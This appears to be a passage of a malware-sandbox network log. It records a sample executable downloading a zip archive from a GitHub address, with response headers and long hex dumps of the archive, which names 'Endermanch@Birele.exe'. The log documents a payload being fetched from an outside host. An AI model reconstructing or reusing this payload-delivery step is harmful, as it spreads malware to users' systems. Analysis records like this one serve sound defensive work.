                                                                                                                                                            2022-09-29 12:45:13 UTC17025INData Raw: 89 94 0b 30 bb 7e 75 c5 31 0c 48 3d 11 49 dc 45 4c 81 95 9b e0 32 d9 b3 4a 85 0c f7 a6 45 f8 aa e8 cb c1 b7 39 f8 7a ce 57 3e 67 4b 2e 03 37 58 c0 dd 60 16 12 85 a4 79 73 bb 1e 1d 79 99 51 30 96 1c 1a 2e 4b 55 9c e4 16 ec 99 50 71 0b a9 a9 28 05 85 28 d5 c7 07 22 0e b4 41 2f b2 93 6c 2c a5 4d f1 99 6a ab 1b 08 7d c4 cb b9 1b 05 54 cc 4d 75 6a aa 69 80 62 07 a1 1a e2 89 2e 36 2a 8a 73 1f 11 b5 0d 8b 98 c3 1c 3d be 0e 73 e9 10 6c 5c 18 52 0a b0 be d6 1e 80 38 ca 67 87 90 46 46 92 ee 30 c2 15 4f 8f ed d5 3a 86 88 64 d8 74 38 ac 73 41 fd bc ba 1f 28 e3 5c d6 9e 72 2d 2b 5d ad f6 65 2b 58 8e 6e 8f 54 f6 b3 54 d1 30 b1 5f 3c 62 61 7a 17 22 11 c0 c7 ce 79 9c 23 50 7e d7 f7 6e c0 0d b7 96 3e b8 8f 41 93 9a 1d 0e df da 4a 83 91 68 b6 52 dc d0 7b e7 a2 41 c1 36 15
                                                                                                                                                            Data Ascii: 0~u1H=IEL2JE9zW>gK.7X`ysyQ0.KUPq(("A/l,Mj}TMujib.6*s=sl\R8gFF0O:dt8sA(\r-+]e+XnTT0_<baz"y#P~n>AJhR{A6


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            9185.199.110.133443192.168.2.649712C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:46 UTC400INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 116134
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "591eaf40b2c1654824c7b57ace22a858e557d50f2bd61e6d218bc09b4c052c63"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 33D4:39B3:7C75A4:8A0A06:6335930F
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:46 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6944-MXP
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1664455487.874036,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 0bf0ae35c8b359947b5bea81cf3825c08e3c5195
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:46 GMT
                                                                                                                                                            Source-Age: 47
                                                                                                                                                            2022-09-29 12:44:46 UTC401INData Raw: 50 4b 03 04 14 00 01 00 08 00 0f b9 98 3f 08 02 e3 81 f6 c4 01 00 00 d2 01 00 15 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 69 72 65 6c 65 2e 65 78 65 78 87 52 7a 1b 81 59 80 6e db ec 5d ee 26 6d 7c 09 66 bf 9b 5b ca c3 1f 74 30 22 7f 86 ac 21 7f ce 7d ef 5b c1 ea 5b 7a d1 dd b0 eb 9b 49 ce 14 14 68 6b 08 48 f5 ec a4 42 03 54 02 12 f6 9d 93 01 c2 cb 0f e2 c9 32 64 50 3b 29 65 4b c7 74 fb 81 69 1a 6f ea cc bb e0 e3 53 1a 43 74 5f 3b 59 df ff a6 59 84 cb 71 1b d4 44 3c e2 d1 f6 be 7b b7 a0 62 95 ae e0 1f d7 0b 6b 49 83 79 23 5c 2d cd 1a 45 47 6d c5 92 5f c5 70 88 d9 7e 4d 94 8b d3 5c a7 b8 c3 66 c3 60 fb 0e 89 2c e7 e4 b3 65 32 70 be fd 5f 58 7b 5e ca c4 22 8d 5e 0f d8 7e 6d 13 c2 f0 ff c8 0a 43 f1 0e ab 32 bd 72 24 c3 10 03 39 3e 75 13 eb 26 26 11 a6 bf
                                                                                                                                                            Data Ascii: PK?Endermanch@Birele.exexRzYn]&m|f[t0"!}[[zIhkHBT2dP;)eKtioSCt_;YYqD<{bkIy#\-EGm_p~M\f`,e2p_X{^"^~mC2r$9>u&&
                                                                                                                                                            2022-09-29 12:44:46 UTC402INData Raw: 8a f5 7c 29 39 16 89 76 c1 a8 b3 1b f0 ef c9 78 a0 8b f8 2f 0e f5 bc e8 c7 0e 5c 35 e1 40 e5 1a a3 c3 53 a1 36 11 3b 2f 25 b5 ef 8f d7 97 89 98 bb e4 eb 9a a6 35 a2 4a 6c eb c9 37 fa 9a ae 7b e5 5c a5 51 a5 d7 58 98 ee 57 4c 6d 06 c0 ec 8c b0 1f 06 85 dc c3 98 82 bc b9 be 0d 30 b8 4b a2 ae 0c 08 19 f3 d3 16 56 c4 87 92 5b 25 12 36 61 be ee 29 11 14 92 10 ba 7e cc 2d 28 bf 0f 8d c5 9f c4 46 dd cb 6a 4f 9d a0 fe ef 2b ca 6b e5 ee 2a 5a 1a 0a 15 85 78 d8 62 0c 3b ba 6f 42 d2 7b e6 1f 39 69 40 5c 35 1c d6 18 4f 2e 5f 56 f5 de be fe b6 81 4d f3 c4 84 09 5f e7 8b e0 28 ea 1c c8 69 a0 33 1b 65 e5 03 1e 6e af ec 02 6c f0 23 42 89 f9 85 a1 a2 88 55 cb a4 af 47 98 f7 32 57 d0 75 55 e8 58 37 6b aa 95 a8 b4 f2 d4 fa 98 58 07 4c 42 4a 70 9f d2 ea c8 57 37 9b 85 c0 d5
                                                                                                                                                            Data Ascii: |)9vx/\5@S6;/%5Jl7{\QXWLm0KV[%6a)~-(FjO+k*Zxb;oB{9i@\5O._VM_(i3enl#BUG2WuUX7kXLBJpW7
                                                                                                                                                            2022-09-29 12:44:46 UTC404INData Raw: c2 6c 59 a4 7e 06 df a3 8c af f5 74 f5 8f 18 d2 5e ee ef 7a d5 71 23 9c ba cf 2e 45 f2 c0 1e 54 12 c6 72 02 6f 6d c5 16 cd ee d2 f3 e4 6f 24 c2 8c 09 8b 53 60 59 c9 2d d0 f8 2e 39 8b b6 8a 24 19 77 17 e7 e2 18 0a 74 2c 90 9d 07 13 f7 3c bf 95 4e 11 de b3 2b 18 f4 14 95 06 b1 6a ec 6f 27 19 3a f8 3d 36 4b 41 b5 2a e4 bb 59 a8 f3 23 fe 7c 16 ff 63 1e c7 3a a4 9c d4 e4 a1 9f 18 e8 3f 9e dd 9e 50 19 38 a5 06 d3 2a 0d 8f 93 ab b4 83 ad a4 1c fb 28 ca c5 8d 26 80 83 a7 b8 dd 6e 85 c7 00 3a 3d a0 0a 5f 54 03 e8 92 25 c6 67 40 eb a2 15 c8 56 d7 de 6b e8 9b 87 2a 95 a9 37 de fe 65 26 f8 85 20 82 76 72 0b 80 bb ad fe ce cb d4 c8 f8 e5 89 19 44 c1 5f 11 36 8d 6a 7e 95 aa a4 c5 ec 20 3c fc 85 77 1c 7e c2 60 3f 39 d8 55 2a 12 e9 cb 2f e4 35 0a 5b 53 69 cf 28 36 23 4c
                                                                                                                                                            Data Ascii: lY~t^zq#.ETromo$S`Y-.9$wt,<N+jo':=6KA*Y#|c:?P8*(&n:=_T%g@Vk*7e& vrD_6j~ <w~`?9U*/5[Si(6#L
                                                                                                                                                            2022-09-29 12:44:46 UTC405INData Raw: c7 90 79 b8 d8 da 89 03 65 0c eb 36 fb f9 de a7 f2 ed 71 e0 30 ab 13 69 70 eb 3d f3 9f b1 f6 07 79 60 ff 38 4f c4 e8 6f 16 71 73 bf 5a 78 22 bd b8 d6 7e 3a e1 1a 9b 08 2e 91 3e 14 08 49 ad c8 78 d0 99 89 4b 1c 05 cb 75 b8 29 93 15 78 77 1b d6 d3 d1 5b 33 26 ee 03 b7 07 4c dc a9 fc 3f 3b 61 b9 94 27 fe 45 4c ab 5a fc b4 bd cc 75 e1 4b 07 37 2a 6f 42 90 14 88 c9 78 c7 02 ce 68 4f 35 0c fe 34 16 a7 c4 35 f2 d5 1b c6 21 49 90 8f 8b 81 12 d5 27 6f b1 d6 9e 24 e2 b1 2b ab c4 4f 91 d6 c3 c0 62 34 e5 ed 6a 5f 0c a0 07 48 a9 70 b2 fb 84 2a 99 06 3b 18 62 ed 46 3a b7 78 78 93 a9 95 3f a1 13 04 78 37 6e 51 42 fd 58 cb db 80 f7 31 ad 66 71 fd ed 0e 71 6f 00 4c 90 d5 e2 a5 7b 77 4f 74 29 27 3e 4b 04 a3 7d 94 8b ed 3d fb b8 db 4c 3b 9e 71 8c c3 a2 0d f3 e8 02 3e 72 6b
                                                                                                                                                            Data Ascii: ye6q0ip=y`8OoqsZx"~:.>IxKu)xw[3&L?;a'ELZuK7*oBxhO545!I'o$+Ob4j_Hp*;bF:xx?x7nQBX1fqqoL{wOt)'>K}=L;q>rk
                                                                                                                                                            2022-09-29 12:44:46 UTC406INData Raw: dc 8e f3 15 82 7e 8b 36 8a 14 ca aa 8e 41 6c 35 9d 0d d3 9b 72 ce e0 af e2 32 1a d7 47 be a6 d2 87 8f fd bc 29 f9 25 8f 2b bf 7a ee 5f f5 d6 16 09 36 21 1d 1b 20 b9 48 44 06 96 07 64 89 2c 15 be 27 3d 6a f7 46 c9 18 87 f7 db 4f c4 72 15 b0 15 cf ae 94 fa 95 34 c9 d2 af f8 1d 30 b0 e5 d3 d8 2a ff 9c 8d 3f 39 cf f3 5f 61 1f 60 0d 94 59 52 c3 b7 18 c5 fb e5 f4 9c ec 79 d2 f7 3b d6 37 f6 3f 7e 97 88 a1 9b c6 f1 73 53 8c 59 89 1d 2b 0d 20 64 61 48 a8 13 85 8c fe 49 72 f6 c0 51 b4 6c 39 7c 99 bd e1 1a 0f e0 7b e2 38 ca 65 91 1c e2 b9 cf 36 36 94 47 96 20 7a 2f 86 a5 36 c3 58 f6 91 74 7f a6 67 ac 94 d3 8e cd 1c a1 d0 da 4d ce fd 8a c0 1f e7 50 64 89 35 a3 74 c8 5e 96 6f 66 fa 7e b5 ff 05 48 57 e8 b2 8e 94 aa 1b 0d 23 fd 07 ea e4 81 c3 1a 8e 1e 56 37 34 ce 99 87
                                                                                                                                                            Data Ascii: ~6Al5r2G)%+z_6! HDd,'=jFOr40*?9_a`YRy;7?~sSY+ daHIrQl9|{8e66G z/6XtgMPd5t^of~HW#V74
                                                                                                                                                            2022-09-29 12:44:46 UTC408INData Raw: 2d ca 24 f5 9c ba 58 c3 29 90 e0 47 6d 3b 4b 82 41 4c cd 3b 56 f0 d8 db 67 39 12 4d f3 e6 91 38 88 ae ce 0b 13 d1 50 ee 3d 34 b5 02 56 8b 0b 95 40 66 08 1a f3 27 9e 8a 88 26 af 84 c6 48 3f 27 d8 3c ff d4 b6 3d a4 96 bc d2 88 65 b6 ec 50 8d 36 b5 1b c6 ec 8a f0 5f d9 c7 77 21 78 f0 fd 9d 5d 02 d7 3f 71 21 da 7b e0 2a a6 b1 2f ed f7 87 c1 67 b2 55 9f 50 f2 93 8c d9 13 02 7b 84 a5 33 39 64 40 10 e2 dc ed ca 41 32 de e9 57 8b 47 ee 68 5b 78 d5 ef 8d 3e a5 c4 ed a5 04 0a 43 bf 54 b0 27 e6 dc fb 16 e3 7d aa 40 a6 8e 8a 07 41 9d 04 4e 1c 90 2f 33 a7 03 91 f4 79 ac 33 60 16 2f 36 6e 6d 26 e1 e6 d0 70 da d0 86 bd 47 9b 27 41 5c ee 80 e3 fb 37 ea 46 41 4e 52 bb 0c db 8b 84 a9 6d 1b 5e 23 47 5f 35 36 1a 66 8b 69 ae 2c cb 4c 55 80 97 de ad 9b bc 26 88 7e 39 d3 08 8c
                                                                                                                                                            Data Ascii: -$X)Gm;KAL;Vg9M8P=4V@f'&H?'<=eP6_w!x]?q!{*/gUP{39d@A2WGh[x>CT'}@AN/3y3`/6nm&pG'A\7FANRm^#G_56fi,LU&~9
                                                                                                                                                            2022-09-29 12:44:46 UTC409INData Raw: 85 af 37 94 7b c6 f5 45 db 21 f7 74 2f 62 98 10 2c d3 f0 06 42 b9 d3 2b c7 24 9d ff 0a a3 22 27 c4 9b 56 ee c9 5d 9f eb 18 6b cc 6d 3b 94 27 fc df 30 73 39 f8 9f 49 cb ba 13 34 65 b1 cb f7 50 97 73 02 e5 cc f8 16 29 f9 fd ba d3 f5 38 37 09 01 af fd d9 97 ae 3b 51 ec 53 25 57 bd 7e bc ba d7 c6 4e e4 2e e2 ab de e6 6f 6f 9c 43 f9 5a 6d 9c af 76 15 02 59 43 56 55 01 1e 24 cb 77 24 de a4 e0 48 e0 9c 0c c7 7e d7 6d fc 2d ec 24 4b 8e c3 03 d5 27 75 da d8 cd f8 4f 8b 1c df fe 8b 7d d7 20 f1 50 e6 a5 0b 7a c8 6e e6 c7 b5 98 29 24 89 d4 76 15 84 d3 bf a3 16 63 62 4b ed 80 0f 3f 1d 4a fb 21 b0 04 e0 fc 51 9e df b8 2a eb 13 bb ef bb c2 dc f1 7e 0a 09 1f 3e 8d 0a 5e 33 d8 1b f5 78 da 6a 8e 5a 4d 40 d5 0f 11 5d b9 27 16 4b 0b 75 8e 11 1f 7c 39 82 d0 65 f2 b0 9c b9 f9
                                                                                                                                                            Data Ascii: 7{E!t/b,B+$"'V]km;'0s9I4ePs)87;QS%W~N.ooCZmvYCVU$w$H~m-$K'uO} Pzn)$vcbK?J!Q*~>^3xjZM@]'Ku|9e
                                                                                                                                                            2022-09-29 12:44:46 UTC410INData Raw: c6 2f 88 a8 1b d7 b6 59 34 af 0e 54 ff cb 92 25 2a e6 68 38 27 80 7b 48 b0 f5 b9 ce ac cb 1d 2a fd a0 8c 20 1b bc 1b f2 03 c7 99 06 8e 9e d9 b8 30 db b3 53 44 a0 e4 0b a2 c3 0d d6 85 47 fa e0 7c 66 45 ac 83 c2 8b f1 93 08 12 40 95 8f ab ce e4 2e 4e c8 3f 7b c1 64 02 75 0e a0 89 28 4b 5f a7 1f 1a 17 92 89 61 94 69 0f 14 5f 0b f0 33 e1 16 bd 9e 23 9a 33 67 d5 1e db 6f e2 77 ac 55 ca 94 90 61 05 5c 7d 4f 3b 4e b8 91 26 6f db 5c 09 1e ca 72 cf 52 0b be 6f 6c 8a 3a ea e7 b5 0b 07 46 49 e4 fb a1 b9 49 59 92 a8 6d 40 a1 a5 7b bf 8e fe 50 8b 2c 00 06 90 6d 23 f7 51 ba a4 a5 ee 5d 52 b5 fc 8a ab 56 2f e7 e3 fc 29 0e 2f e2 70 82 ce 4b e9 f3 f5 7b eb 3b 40 af a6 69 1f 0b 01 be 84 89 56 7b 6e 23 61 a8 3a 74 69 90 7b 27 d9 8e 66 d1 6b e5 cf 9c 49 de 22 0f a8 54 6f ef
                                                                                                                                                            Data Ascii: /Y4T%*h8'{H* 0SDG|fE@.N?{du(K_ai_3#3gowUa\}O;N&o\rRol:FIIYm@{P,m#Q]RV/)/pK{;@iV{n#a:ti{'fkI"To
                                                                                                                                                            2022-09-29 12:44:46 UTC412INData Raw: 32 b1 6c 7c 05 84 57 c8 2c c7 2f 11 e6 09 07 62 fd b1 78 16 7e 07 2b 0d 19 cc eb 17 3e d0 eb 2e a6 19 7a 4a d4 63 34 33 9b 1f 1d c9 f0 7c f4 65 14 fd 1d af f3 5e 2b 84 20 49 bf 14 10 36 f9 94 ea de 28 e1 e6 c1 24 b1 52 0b 8b 10 f8 cb 56 c9 84 ae 54 14 4b 80 cc b3 40 9e c0 b1 98 42 dd af 1d 20 ab 14 96 8a c9 54 a0 90 5f 30 23 ec 68 b6 9b e5 d1 5b d5 cc 4b eb 3c db 98 19 e5 6f 2f 70 a9 c7 9b 0c ad cb 22 1a 07 0c 38 5a 29 e0 d8 0a 9d db 9a 33 81 04 9b ff 95 dd 26 ee b9 c3 d1 ee a3 06 f5 e4 5a 80 5e 50 19 a3 7d 56 17 60 6a f8 0e cb 4f 74 37 1e 0c 6c 4a b1 ea d2 4e a7 51 ec 8d 8e d5 f5 98 f5 3e 0f f5 2b fb b2 44 aa d2 ef 6a 7a 23 ba 62 50 5b 27 81 88 7c 91 11 71 36 01 33 61 d4 96 e6 fa d2 46 9b e0 f6 e4 ce 5b 21 39 b3 56 b7 be 8b a4 00 44 be b8 7a 94 67 2b e0
                                                                                                                                                            Data Ascii: 2l|W,/bx~+>.zJc43|e^+ I6($RVTK@B T_0#h[K<o/p"8Z)3&Z^P}V`jOt7lJNQ>+Djz#bP['|q63aF[!9VDzg+
                                                                                                                                                            2022-09-29 12:44:46 UTC413INData Raw: 31 c5 14 a1 df 68 f3 a8 20 e3 c5 b4 58 ba 54 57 49 8e db c3 36 b2 f7 74 f1 f8 c3 78 89 12 a5 8f ab 92 61 6a 62 a6 33 7a 20 4a e4 d7 39 2c 1f a8 f3 a7 4d d5 0f 26 21 8a 0a 73 4f 8e 20 56 68 a0 9d d5 8c 79 39 b4 4c 47 81 90 cc 6f e0 5f e1 63 e3 5f 10 f7 ee 8a 3d 8d 14 e0 3f af 46 e7 9b bc d8 a7 25 98 a4 7c a6 bb 11 af 6a e3 80 cf 9b 2d b2 e4 90 fd 45 66 4c fe 80 b8 27 b2 07 07 7b 99 69 8f f2 c6 4f 0e 2d 03 51 15 d4 7e 1f 14 74 45 cd 53 a6 6d c7 f3 2a 2b c2 2d 01 81 05 08 b2 54 b0 87 e2 74 43 39 32 57 04 b3 81 c4 b7 7b 77 d6 d7 f5 c3 43 00 4f 49 a0 cb 4b 9c 2b c2 d9 56 02 38 31 b8 b9 f2 ea a1 9a c0 ce c3 cc 75 a4 c4 ab e7 92 76 7d 1c b2 23 c2 f3 75 96 8d c0 24 52 8a 5f a6 42 59 8a 94 89 ec 01 4e c9 ac 72 de 43 85 22 db b2 ee 4b e1 b5 a3 31 5a 6b 2a ab ff 85
                                                                                                                                                            Data Ascii: 1h XTWI6txajb3z J9,M&!sO Vhy9LGo_c_=?F%|j-EfL'{iO-Q~tESm*+-TtC92W{wCOIK+V81uv}#u$R_BYNrC"K1Zk*
                                                                                                                                                            2022-09-29 12:44:46 UTC414INData Raw: bf c3 4c cc f3 48 a1 f1 37 d0 a5 1b bf 67 33 3f 75 bd 10 d0 df 9d df 59 4c 1a 53 35 51 a1 69 ca 07 cc 5c e4 89 8c 25 6e fd c5 a8 3f 23 f1 f8 05 24 25 9d f6 0c a0 33 dc df ef 13 9b 51 cd 61 95 b7 8f 15 32 af 9b f4 a4 de b4 4c 9d d3 11 7a 04 48 63 81 81 a4 d5 0e b3 e6 f9 8a b9 a0 83 55 0d 51 a0 0f c6 cb 99 41 57 9c 01 6e 08 0a 8f 72 56 60 89 1e 3b 80 ed a5 c7 1b 53 82 bb c6 59 5b 4e 3c e7 07 ba 30 46 90 4b c3 9f 52 05 6c 7a a6 06 3b 6f 9d d2 ab 5b 89 26 4e 52 02 80 e6 32 c9 2a ae c9 30 5b fb a2 5d d5 79 87 ec b3 40 0a b3 3a f0 27 62 4a 5c 57 1d 5f 1b 4f 20 82 50 0e 87 59 b6 a6 2d b1 da 89 dd f0 a9 a4 3e 00 d8 0a 3e ee 3a 9e 0f a3 6c 69 89 fe dd 3b 98 b9 d0 dc 45 b7 53 ac 78 9f e1 e6 6c a1 a7 e8 45 23 0c 9f a9 81 ba 7f 70 23 e1 ac f1 a0 08 bd 47 7f 5e 2f f9
                                                                                                                                                            Data Ascii: LH7g3?uYLS5Qi\%n?#$%3Qa2LzHcUQAWnrV`;SY[N<0FKRlz;o[&NR2*0[]y@:'bJ\W_O PY->>:li;ESxlE#p#G^/
                                                                                                                                                            2022-09-29 12:44:46 UTC416INData Raw: 3a 7d 7f b8 ac 6a 77 3e 70 4b 17 88 5b f2 ca 0d b1 32 ae 01 76 af 8d e9 cf de 6f be 1b b6 cb bb ac 98 41 c9 b3 c2 1a ac 33 a2 dc 94 f4 38 d2 37 7f a3 c0 88 9a bb e1 3c 6e 86 33 f9 fa 4c 7c 24 ae 50 0b 11 1b 65 f0 61 28 8c e3 8d af 67 de f2 ec 0c 2d a3 2e a8 d5 41 f7 0a d3 13 66 da 0c 99 fa b5 4d 77 4d 59 f4 79 fd 58 87 dc 71 ad 2e 76 7a 58 cb 0f 1f c1 e8 4d 7d 1a d0 f6 a4 49 97 96 12 6f 43 8b e4 e3 d4 86 6d 86 cc d5 0f ea f2 b0 d3 c6 40 6e 75 72 e8 25 70 4b b7 5b c6 ed 59 32 27 b8 2b a1 f1 17 29 63 0f d1 5f bc 32 44 e4 d4 50 a6 8b 35 74 ff 15 ae a5 ae 75 48 bd 30 0b 24 70 e3 07 9c 7f d1 d2 68 ab dd c2 8e d5 78 7b 55 80 83 4f f6 cf f6 22 a8 7e a1 4a 86 2b b3 05 97 90 53 20 41 e1 cc 34 6f d9 18 7f f7 20 fb 5d 33 b3 dd 9b 15 77 77 ab 91 92 6c c9 45 69 86 5e
                                                                                                                                                            Data Ascii: :}jw>pK[2voA387<n3L|$Pea(g-.AfMwMYyXq.vzXM}IoCm@nur%pK[Y2'+)c_2DP5tuH0$phx{UO"~J+S A4o ]3wwlEi^
                                                                                                                                                            2022-09-29 12:44:46 UTC416INData Raw: 81 9f a1 72 30 0d f3 fc d2 35 43 d9 5c 1d 9f 00 a8 c9 af 5f ba 08 6d 37 6f 12 47 40 02 85 7c 44 cf 6d 40 dc c2 56 32 20 ce 6a 8d 7b 1d 95 37 b4 9a 63 62 9e 38 fa f3 fc 16 7d b5 a5 7f d3 a1 02 f9 29 64 f4 9f de d7 37 31 9e 27 f4 0e 5d 94 bb d8 d6 1d 09 9b c0 58 d3 1a 67 99 47 ab c9 8d db 28 53 8e 4c c6 75 4a 51 bc 95 4a 87 eb 5a 44 65 b0 3a 1d 36 8e 5c 0d de 29 77 67 e2 34 0a d0 54 dc 5d 86 76 1c 08 89 a8 d1 7f fa bb 06 40 e7 d9 d0 40 92 8e ff fb 46 e9 9b 9f ce 93 a1 0e a2 62 d3 77 e5 91 a0 12 aa 37 42 94 7f 9a 5e 40 96 6b ef ea 52 4a c7 b2 f4 8a 5a d7 11 14 d1 36 db 7c a4 d3 9d d8 89 36 d7 61 73 09 07 84 0a 97 68 dd d8 eb 02 48 bb 5f ee bb 4c 5d c8 6f 50 22 39 b6 ab 6b f0 c8 73 53 8c 87 dc cc 4b 78 10 3b f7 69 c8 ef 82 d9 e1 31 6f e4 66 51 87 79 81 d6 d6
                                                                                                                                                            Data Ascii: r05C\_m7oG@|Dm@V2 j{7cb8})d71']XgG(SLuJQJZDe:6\)wg4T]v@@Fbw7B^@kRJZ6|6ashH_L]oP"9ksSKx;i1ofQy
                                                                                                                                                            2022-09-29 12:44:46 UTC432INData Raw: 70 30 94 7c 1f ae 95 d5 92 33 05 5e 83 44 07 53 00 08 8e 48 e9 a0 43 02 63 f5 3c 1e c1 c7 9b 86 f8 8f 5d 3a 41 ea 32 ac 5b e0 e2 6a bb 73 00 aa 24 2c e1 70 64 a5 34 cc cc a9 8f 1b 98 42 22 12 dd 7f 86 b0 81 51 12 1b b1 e0 38 be 82 0b 50 50 bd ff 83 b1 5d 38 cb ab 97 f7 b8 9a 05 69 12 96 b2 98 8d f2 1f a9 04 cf a1 e7 8c 45 b6 0d ef 7f 87 0b 0a 2a 08 b5 59 28 9a 8c 2c fd 34 3b dd 4c 6d 37 d0 4f a5 8e 58 92 16 46 91 44 d6 b9 62 8f c1 3c c7 a3 d0 ee 54 24 7e 5a b0 a6 f8 c7 94 b3 2d 05 e8 3d c0 9d f3 6e 33 10 83 e2 e4 49 b8 e3 3b 38 a2 a3 66 ff 6b 37 9a 66 5e ad 4c 04 9c 5e eb b8 3c 50 6a 96 36 b2 1b 99 86 22 60 c8 af dc 06 df 1e 74 d8 e8 72 fa 48 bb ff d3 32 23 dd fe c8 02 3e fc 5b d2 c2 1f c2 32 6f a6 c8 fb 8c 8b 26 7d b1 89 4f 39 27 e6 76 bf 49 06 d1 ad 5e
                                                                                                                                                            Data Ascii: p0|3^DSHCc<]:A2[js$,pd4B"Q8PP]8iE*Y(,4;Lm7OXFDb<T$~Z-=n3I;8fk7f^L^<Pj6"`trH2#>[2o&}O9'vI^
                                                                                                                                                            2022-09-29 12:44:46 UTC448INData Raw: 6b b2 4b d1 9b d4 f9 95 6d b2 6d e6 23 e8 ff 53 7b f4 05 2a 3f 53 a3 a1 66 89 c1 91 dd 62 a6 bb 72 f3 a5 95 99 34 6c 7b df 00 c6 2a f8 23 95 d7 4f e8 b1 cb e5 c3 d6 2a fd a5 50 a8 97 23 5b 0f 79 b4 be b4 1d e1 45 6c 47 7a 5e 6d 5f f8 4a 2d 87 dc 55 c3 3f 5b 0e db b4 a0 f0 10 2b a3 6b 92 6b 87 c1 6b 69 18 aa 01 57 30 a7 22 32 76 21 22 62 db ed 73 ff 80 48 2d 27 ce f0 6e e4 fe 7a 24 12 d8 16 d7 fa 42 05 1b 4c d0 88 1e 7e 64 b1 0b 90 07 fb 36 c0 73 30 5c c5 77 41 f5 fc 63 d0 8a b3 f9 85 ff 58 4f 0c 4f d4 c2 59 a0 b7 98 6b 4e a0 79 0c 07 61 ee 51 ed 43 35 13 04 93 60 c6 7c 35 da fe b1 0f cd fa c9 3e a3 95 ce 1e ac f8 4b 9b 3b b0 aa d2 15 dc 45 8b 30 2a 32 b4 74 6c 02 14 ec f6 67 1c a5 3d 71 46 e5 78 5a 26 fa e9 29 b4 9e 44 d4 b8 8c 31 7d f3 9b af a9 31 44 4b
                                                                                                                                                            Data Ascii: kKmm#S{*?Sfbr4l{*#O*P#[yElGz^m_J-U?[+kkkiW0"2v!"bsH-'nz$BL~d6s0\wAcXOOYkNyaQC5`|5>K;E0*2tlg=qFxZ&)D1}1DK
                                                                                                                                                            2022-09-29 12:44:46 UTC464INData Raw: 9a 8f 83 8f 02 7a cb 37 bb fd ca e7 a7 e0 3f 90 12 79 fa be c2 e9 9e 5f 68 cb 77 27 0f 26 34 5f f3 93 84 61 50 7a 3f ac 9b f4 5b 64 ff 5b ff 80 30 d6 60 af a3 8d e3 f4 cd d7 cc 1a 31 ca 5d 22 56 ac 1a a4 13 9c 47 97 6c 4b 01 55 df 3e aa 28 08 a9 aa 33 01 da 53 80 ce 06 4f 87 77 db 82 4c 6f 01 28 8e f6 7a 6e 66 44 56 cb b8 66 4f 24 25 90 f1 3c 10 5e 7c f5 09 94 4f b5 fa dc 84 d2 1d f1 a6 6c d4 3b 14 52 55 e9 b4 67 61 b8 43 72 bb 7e 46 63 a5 d0 b4 1c 38 71 d2 74 e5 81 f8 f0 ae 78 eb 70 1c a4 01 da 90 f8 43 d8 2f 82 ac 11 ce 1e 3d f3 5a 91 d6 8e 2f d7 19 9c b1 21 02 df f9 bc 5d 55 6d 89 4e 4c 42 48 68 bd f8 45 40 c5 d5 88 6c 42 bf 67 a4 c7 c2 dd 0c 1f a8 2d bc 92 e9 29 51 d1 4d 55 81 df 41 07 0f bb 54 1f 79 2e 19 f7 8c 61 32 c1 6b a2 5a 36 1b 80 ac af f4 c2
                                                                                                                                                            Data Ascii: z7?y_hw'&4_aPz?[d[0`1]"VGlKU>(3SOwLo(znfDVfO$%<^|Ol;RUgaCr~Fc8qtxpC/=Z/!]UmNLBHhE@lBg-)QMUATy.a2kZ6
                                                                                                                                                            2022-09-29 12:44:46 UTC480INData Raw: 8b a4 c6 2c b0 5b 51 9f 28 9a f8 06 45 2f d9 53 4a 0a c1 b4 c5 63 2f 1d ba 07 6a 18 13 45 9c 18 a2 05 d3 87 18 b1 10 23 2e 1d 3c c2 06 dc bd 37 04 56 d0 b1 41 08 ed 33 fd 40 e7 7b 08 66 31 17 88 e1 81 ab eb d5 ea 29 55 31 01 ee f6 3b 22 54 0e 4e 1c e6 31 62 b2 3f f9 88 92 3e c1 f0 21 93 b6 2e 9a bf f8 88 a5 b0 b4 b4 40 a4 1c c9 e4 4c 0c 76 23 0b d0 ea 79 8b c3 26 0a 60 49 28 c4 4e 32 5e bd 4e 17 bb cb b8 22 27 03 dd c2 c1 dc a8 ec 04 c8 e5 e5 fd c1 a6 49 85 ca 24 d5 5f 9c 98 45 a8 72 bb cb 36 ce 71 49 bc 1c a1 d2 59 30 f7 f2 42 18 1b b8 d1 73 6f 84 8f eb ae 03 da 14 11 53 12 e2 f6 96 bb 07 f8 95 86 5b c9 f1 ba cd 92 3f a9 ef c7 95 fa 3a fa dc 76 1e c6 bd a1 c2 55 1d 08 21 55 e5 02 df f2 10 f0 9b b0 85 d3 66 75 cd dc b2 d6 03 d7 4e e3 65 b2 fd 64 18 15 96
                                                                                                                                                            Data Ascii: ,[Q(E/SJc/jE#.<7VA3@{f1)U1;"TN1b?>!.@Lv#y&`I(N2^N"'I$_Er6qIY0BsoS[?:vU!UfuNed
